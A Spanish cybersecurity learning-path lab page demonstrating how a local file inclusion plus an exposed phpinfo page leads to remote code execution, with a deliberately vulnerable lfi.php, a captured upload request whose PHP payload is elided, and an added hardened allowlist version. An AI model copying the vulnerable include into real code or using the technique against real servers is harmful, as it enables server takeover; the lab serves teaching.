CSLP by EduardoDesdes

Cyber Security Learning Path in Spanish ewe


PhpInfo + LFI = RCE

Setting up the environment

Current version

PHP Version 7.4.11

Create the files in the /var/www/html directory

┌─[root@parrot]─[/var/www/html]
└──╼ #cat phpinfo.php 
<?php
	phpinfo();
?>
┌─[root@parrot]─[/var/www/html]
└──╼ #cat lfi.php 
<?php
	require($_GET['file']);
?>

Running the exploit

Exploit Run

Get Shell

Analyzing the exploit

In the code

[Image: Xploit]

[Image: xploit2]

Analyzing with Wireshark

Packet HTTP

Packet HTTP Request

POST /phpinfo.php?a=A...A HTTP/1.1
HTTP_ACCEPT: A...A
HTTP_USER_AGENT: A...A
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714
Content-Length: 3661
Host: 127.0.0.1

-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security Test
<?php
    ...code...;
?> 

-----------------------------7dbff1ded0714--

Packet HTTP Response

[Image: packeter_http_response]

Execute PHP Code

[Image: Request-Shell-Code]
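
Added example, not part of the original post: a hardened counterpart to the lab's lfi.php, which passes $_GET['file'] straight to require(). The page keys, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical layout: includable pages live in ./pages next to this script.
const PAGES_DIR = __DIR__ . '/pages';

// Hypothetical allowlist: request key => fixed file name under PAGES_DIR.
// The request never supplies a path, only one of these keys.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page key to an absolute path, or null if rejected.
 */
function resolve_page($key): ?string
{
    // Arrays (?file[]=x), missing values and unknown keys are rejected.
    // Any path or stream-wrapper string fails here because it is not a key.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_PAGES)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$key]);

    // Defence in depth: the file must exist and resolve inside PAGES_DIR,
    // which also catches a symlink in pages/ that points somewhere else.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $path;
}

$path = resolve_page($_GET['file'] ?? null);
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}

require $path;
```

Removing phpinfo.php from the document root takes away the other half of the chain named in the title.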
